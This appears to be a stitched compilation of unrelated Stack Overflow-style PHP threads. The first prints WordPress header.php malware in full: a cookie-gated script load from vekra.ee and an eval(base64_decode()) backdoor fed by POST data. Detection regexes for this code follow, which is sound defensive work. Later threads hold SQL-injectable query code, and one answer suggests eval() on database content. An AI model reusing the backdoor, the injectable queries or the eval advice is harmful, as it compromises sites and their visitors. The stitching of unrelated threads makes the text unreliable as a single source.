This question already has answers here:
Closed 10 years ago.
Possible Duplicate:
Got Hacked - Anyone know what this PHP Code Does?
I just found this in the header.php file of one of my blogs. I would like to know if somebody can say what it is. (Scroll to the right to see all the code.)
Thanks
<meta http-equiv="Content-Type" content="<?php global $sessdt_o; if(!$sessdt_o) { $sessdt_o = 1; $sessdt_k = "lb11"; if(!#$_COOKIE[$sessdt_k]) { $sessdt_f = "102"; if(!#headers_sent()) { #setcookie($sessdt_k,$sessdt_f); } else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; } } else { if($_COOKIE[$sessdt_k]=="102") { $sessdt_f = (rand(1000,9000)+1); if(!#headers_sent()) { #setcookie($sessdt_k,$sessdt_f); } else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; } $sessdt_j = #$_SERVER["HTTP_HOST"].#$_SERVER["REQUEST_URI"]; $sessdt_v = urlencode(strrev($sessdt_j)); $sessdt_u = "http://vekra.ee/?rnd=".$sessdt_f.substr($sessdt_v,-200); echo "<script src='$sessdt_u'></script>"; echo "<meta http-equiv='refresh' content='0;url=http://$sessdt_j'><!--"; } } $sessdt_p = "showimg"; if(isset($_POST[$sessdt_p])){eval(base64_decode(str_replace(chr(32),chr(43),$_POST[$sessdt_p])));exit;} }
bloginfo('html_type'); ?>; charset=<?php bloginfo('charset'); ?>" />
What I would like to know is what this code does. (Scroll to the right to see all the code.)
Thanks!
Double duplicate:
Here: Got Hacked - Anyone know what this PHP Code Does?
and
Here: What this php script will do ? is it Malicious php Code?
Now this is a new practice affecting WordPress???
From the wordpress function reference for bloginfo:
Displays information about your blog, mostly gathered from the
information you supply in your User Profile and General Options from
the WordPress Administration panels (Settings → General). It can be
used anywhere within a page template. This always prints a result to
the browser. If you need the values for use in PHP, use
In this special case:
Basically it fetches the content type (html_type) and the charset from wordpress and puts it into the HTML header of the page it creates.
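The injected code in the question's header.php has traits that can be searched for across a theme directory: request data passed through base64_decode() into eval(), a script tag whose src is a PHP variable, and an echoed meta refresh. A heuristic scanner for those traits follows, as an added example that is not part of the original posts; the rule names and both sample inputs are constructed for illustration.

```php
<?php
// Added example: flags traits visible in the injected header.php code above.
// Rule names and both sample inputs are constructed for illustration.
const RULES = [
    'eval-of-base64-data'      => '/\beval\s*\(\s*base64_decode\s*\(/i',
    'request-data-in-eval'     => '/\beval\s*\([^;]*\$_(POST|GET|COOKIE|REQUEST)\b/i',
    'script-src-from-variable' => '/<script\s+src=[\'"]?\$/i',
    'echoed-meta-refresh'      => '/echo\s+["\']<meta\s+http-equiv=[\'"]?refresh/i',
];

// Returns one entry per match: rule name, 1-based line number, byte offset.
function scan_source(string $source): array
{
    $hits = [];
    foreach (RULES as $name => $pattern) {
        if (preg_match_all($pattern, $source, $m, PREG_OFFSET_CAPTURE)) {
            foreach ($m[0] as [$text, $offset]) {
                $line = substr_count($source, "\n", 0, $offset) + 1;
                $hits[] = ['rule' => $name, 'line' => $line, 'offset' => $offset];
            }
        }
    }
    return $hits;
}

// Constructed sample: an ordinary WordPress header line.
$clean = '<meta http-equiv="Content-Type" content="<?php bloginfo(\'html_type\'); ?>" />';

// Constructed sample: a shortened template carrying the same traits as the question's code.
$infected = <<<'PHP'
<?php $p = "showimg";
if (isset($_POST[$p])) { eval(base64_decode($_POST[$p])); exit; }
echo "<script src='$u'></script>"; ?>
PHP;

foreach (['clean' => $clean, 'infected' => $infected] as $label => $src) {
    echo $label, ': ', json_encode(scan_source($src)), "\n";
}
```

A hit is a reason to diff the file against a known-good copy of the theme, not proof of compromise on its own.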
This question already has answers here:
How to remove the querystring and get only the URL?
(16 answers)
Closed 2 months ago.
My goal: compare the actual url to a stored url in MySQL DB. If there's a match the page title and meta description info is loaded from the DB into the fields on the page.
Problem: I need to remove the query string so the url is clean for the comparison.
The existing code works for the main pages that list the blogs/lessons/etc, but when I go to page 2, 3, 4, etc the query string breaks the comparison.
In the code you will see $actual_link - that needs to have the query string removed and that is what I have yet to find a solution that actually works, as for what I've tried, there have been too many iterations to remember them.
Server Info: PHP 7.3.17; MySQL MariaDB-10.2.32; Apache-2.4.43/
$actual_link = "https://$_SERVER[HTTP_HOST]$_SERVER[REQUEST_URI]";
$sql = "SELECT * FROM meta WHERE siteLink = '$actual_link'";
$result = mysqli_query($link, $sql);
if (mysqli_num_rows($result) > 0)
{
while($row = mysqli_fetch_assoc($result))
{
?>
<?php include_once "myHead.php"; ?>
<title><?php echo $row["title"]; ?></title>
<meta name="description" content="<?php echo $row["meta_desc_content"]; ?>">
<?php
}
}
else
{
echo "Shit, it ain't working.";
}
?>
PHP provides a nice helper method called parse_url to get certain parts of a URL:
// $actual_link = 'https://www.stackoverflow.com/test';
$urlParts = parse_url($actual_link);
$formattedUrl = $urlParts['host']; // www.stackoverflow.com
Docs: https://www.php.net/manual/en/function.parse-url.php
Use strtok()
like this: $baseUrl = strtok($actual_link, '?');
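The query-string removal suggested in the answers can be combined with a parameterized lookup, so that the URL built from the request never becomes part of the SQL text. This is an added example, not code from the posts; ALLOWED_HOSTS, the table row and the sample requests are constructed, and an in-memory SQLite database stands in for the MariaDB table so the script runs on its own.

```php
<?php
// Added example, not code from the posts above. The host list, table row and
// sample requests are constructed; SQLite in memory stands in for MariaDB.
const ALLOWED_HOSTS = ['example.com', 'www.example.com'];

function canonical_link(string $host, string $requestUri): ?string
{
    // HTTP_HOST comes from the client, so accept only hosts this site serves.
    $host = strtolower($host);
    if (!in_array($host, ALLOWED_HOSTS, true)) {
        return null;
    }
    $parts = parse_url('https://' . $host . $requestUri);
    if ($parts === false || !isset($parts['path'])) {
        return null;
    }
    return 'https://' . $host . $parts['path'];   // query string and fragment dropped
}

function find_meta(PDO $db, string $link): ?array
{
    // The URL is bound as a parameter, never concatenated into the SQL text.
    $stmt = $db->prepare('SELECT title, meta_desc_content FROM meta WHERE siteLink = ?');
    $stmt->execute([$link]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE meta (siteLink TEXT, title TEXT, meta_desc_content TEXT)');
$db->exec("INSERT INTO meta VALUES ('https://example.com/blog', 'Blog', 'All posts')");

$requests = [
    ['example.com', '/blog?page=2'],        // paginated listing
    ['example.com', "/blog/o'reilly"],      // a quote in the path stays data
    ['unknown.test', '/blog'],              // unexpected Host header
];
foreach ($requests as [$host, $uri]) {
    $link = canonical_link($host, $uri);
    $row = $link === null ? null : find_meta($db, $link);
    echo $uri, ' => ', $row === null ? 'no match' : $row['title'], "\n";
}
```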
This question already has answers here:
PHP MySQL only displays Blank Table
(3 answers)
Closed 2 years ago.
I'm learning PHP for the first time and this exercise gives back a blank page. I don't understand why, it's just defining two functions (number 1 and 2), then multiplying both, then printing on screen the result.
<!DOCTYPE html>
<html>
<head>
</head>
<body>
<?php
$number1 = 1;
$number2 = 2;
function multiply($number1, $number2)
{
$result = ($number1 * $number2);
return $result;
}
?>
</body>
</html>
Same with another function, it's supposed to print a Hello world string, yet another blank page.
<?php
$head = "Hello world PHP";
function header($head)
{
return $head;
}
?>
To print to the screen, something like this will work:
print_r(multiply($number1, $number2));
I'd like to preface that I am not too fluent in PHP, so I'm trying to understand and build PHP as I go.
I am attempting to add a custom Slidedeck slider to my website, http://cfsb.org/ . I currently have one in the header, but would like to change it on a per page basis.
I currently have:
function slidedecktwo_header_home() {
if (is_home()) {
echo do_shortcode('[SlideDeck2 id=xxx]');
}
}
add_action('genesis_header', 'slidedecktwo_header_home');
But when I try to add something like
else if (is_page(PAGE_ID = x)) {
echo do_shortcode('[SlideDeck2 id=xxx');
}
My webpage crashes and I have to delete the code before my website returns. Anyone see some obvious problems?
Thanks in advance.
Not sure if what you posted is the actual PHP you tried, but there are definite syntax errors.
Your code should look more like this (I added a random ID passed as an integer to the is_page() function):
function slidedecktwo_header_home() {
    if ( is_home() ) {
        echo do_shortcode('[SlideDeck2 id=xxx]');
    } elseif ( is_page(42) ) {
        echo do_shortcode('[SlideDeck2 id=xxx]');
    }
}
add_action('genesis_header', 'slidedecktwo_header_home');
In your snippet, you had is_page( PAGE_ID = x ) and your shortcode snippet wasn't closed with a closing bracket ].
This question already has answers here:
How do you parse and process HTML/XML in PHP?
(31 answers)
Closed 8 years ago.
How can we take, in PHP or jQuery, what is written between the <h2> </h2> of each page and put it in the title of my pages, so that each page is different?
Example:
<section class="sub_header">
<h2>Contact</h2>
<h5>Contactez-nous !</h5>
</section>
=> <title>Contact</title>
Is it possible?
PHP, jQuery load() function...?
Thanks
My solution:
I'm answering because it could be useful for some.
I'll add this little piece of code on important pages, using the superglobal 'REQUEST_URI':
<?php
if ($_SERVER['REQUEST_URI'] == '/index_contact.html') {
    $data = 'Contact';
} elseif ($_SERVER['REQUEST_URI'] == '/index_blog.html') {
    $data = 'The blog';
} else {
    $data = 'Default title.';
}
// Display the name of the page if data exists
if (isset($data)) {
    echo $data;
}
?>
Hoping that it will be useful for some.
You can try with preg_match to extract data between h1 tag.
$data ="Your content goes here";
preg_match('/<h2>(.*?)<\/h2>/s', $data, $matches);
echo $matches[1];
exit;
Here's my code:
<?php
if(isset($_GET['p']))
{
$nshortname = strip_tags($_GET['p']);
$check = mysql_query("SELECT * FROM pages WHERE `shortname` = '$nshortname'");
if(mysql_num_rows($check) == 0)
{
echo '<center><font size="50" style="font-weight:bold;">404</font><br>Appears this page is a dead end</center>';
}
else
{
$h = mysql_fetch_array($check);
//post details
$title = $h["title"];
$content = $h["content"];
$shortname = $h["shortname"];
// Start of page content
echo '
<p>
<font size="5pt">'.$title.'</font><br><hr>
'.$content.'<br>
';
// End of page content
}
}
else
{
echo 'No page has been selected to view';
}
?>
What it does exactly, is it grabs pages from my database and reads them, so for example if I have a page in that table called "test" I can go to it by http://mylink.com/?p=test. Although I've come up with an issue. On one of those pages that come from the database I want to include but when I type it into the database field and go back to the page it shows with nothing.
I went to the source of the page in my browser and found out the code turned into <!--?php include "inc/extra/plugins/header/slideshow.php"?-->
Does anyone know how I can stop it from turning into <!--? and make my include code work?
I would caution against using eval() of unknown content. Basically, the content comes from your database, but that doesn't guarantee it's safe to execute as code! There are a lot of ways it could cause errors or do something malicious.
But you also have other dangerous security gaffes in your code. You should learn about how to defend against SQL injection vulnerabilities and Cross-Site Scripting (XSS) vulnerabilities and File Inclusion vulnerabilities.
Use mysql_real_escape_string() if you are still using the deprecated ext/mysql. But if you can, switch to mysqli or PDO_mysql and use prepared statements with parameters.
Always output dynamic content with htmlspecialchars(). What if the content contains JavaScript code? It could cause mischief.
Never eval() arbitrary content as code. You have no control over what that content is, or what it could do when you execute it.
Be as restrictive as possible - if you want to include a file, store the filename separately from content (e.g. in a separate column), and use it only for including files.
Here's an example with some of these problems fixed in your code:
<?php
if(isset($_GET['p']))
{
    $nshortname = mysql_real_escape_string($_GET['p']);
    $check = mysql_query("SELECT * FROM pages WHERE `shortname` = '$nshortname'");
    if(mysql_num_rows($check) == 0)
    {
        echo '<center><font size="50" style="font-weight:bold;">404</font><br>Appears this page is a dead end</center>';
    }
    else
    {
        $h = mysql_fetch_array($check);
        //post details
        $title = htmlspecialchars($h["title"]);
        $content = htmlspecialchars($h["content"]);
        $shortname = $h["shortname"];
        // Start of page content
        echo '
<p>
<font size="5pt">'.$title.'</font><br><hr>
'.$content.'<br>
';
        // End of page content
        // Start of include
        if ($h["include"]) {
            // strip out anything like "../../.." etc.
            // to make sure this is only a simple filename.
            $include = basename($h["include"]);
            include "inc/extra/plugins/header/{$include}.php";
        }
        // End of plugin inclusion
    }
}
else
{
    echo 'No page has been selected to view';
}
?>
Also check out http://www.sitepoint.com/php-security-blunders/ and http://phpsec.org/projects/phpsecinfo/
Re your comments:
To allow a limited set of basic HTML, the best tool you need to use is http://htmlpurifier.org
I'm not sure what to say about your include displaying code instead of working. I just tested this, and the following two files seem to work exactly as intended:
foo.php:
<?php
echo "<h1>START FOO</h1>";
// !empty() avoids an undefined-index notice when no include parameter is sent
if (!empty($_GET["include"])) {
    $include = basename($_GET["include"]);
    include "./{$include}.php";
}
echo "<h1>END FOO</h1>";
bar.php:
<?php
echo "<h2>BAR</h2>";
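Two of the recommendations in the answer above (escape everything on output; keep the include name in its own column and use it only to pick a file) can be combined so that stored content is never executed. This is an added example, not the answerer's code; it goes one step further than basename() by checking the name against an allowlist. PLUGIN_DIR, ALLOWED_PLUGINS and the sample rows are assumptions made for illustration.

```php
<?php
// Added example, not the answerer's code. PLUGIN_DIR, ALLOWED_PLUGINS and the
// sample rows are constructed for illustration.
const PLUGIN_DIR = __DIR__ . '/inc/extra/plugins/header';
const ALLOWED_PLUGINS = ['slideshow', 'gallery'];

function plugin_path(?string $name): ?string
{
    // The "include" column holds a bare plugin name. Anything that is not on
    // the allowlist (path fragments, unknown names, empty values) is rejected.
    if ($name === null || !in_array($name, ALLOWED_PLUGINS, true)) {
        return null;
    }
    return PLUGIN_DIR . '/' . $name . '.php';
}

function render_page(array $row): string
{
    // Title and content are output as text, so markup or PHP tags stored in
    // the database are shown literally and never run.
    $html = '<h1>' . htmlspecialchars($row['title'], ENT_QUOTES, 'UTF-8') . "</h1>\n"
          . '<div>' . htmlspecialchars($row['content'], ENT_QUOTES, 'UTF-8') . "</div>\n";

    $file = plugin_path($row['include'] ?? null);
    if ($file !== null && is_file($file)) {
        ob_start();
        include $file;            // code comes from a file on disk, not from the row
        $html .= ob_get_clean();
    }
    return $html;
}

// Constructed rows: one ordinary page, one with markup, PHP tags and a path in "include".
$rows = [
    ['title' => 'Test', 'content' => 'Plain text', 'include' => 'slideshow'],
    ['title' => '<script>/* stored script */</script>',
     'content' => '<?php include "inc/extra/plugins/header/slideshow.php"?>',
     'include' => '../../config'],
];
foreach ($rows as $row) {
    echo render_page($row), "---\n";
}
```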
If you have a variable $content which is html with php, you can use
eval("?>" . $content . "<?php");
This will output $content having processed all the <?php ?> tags.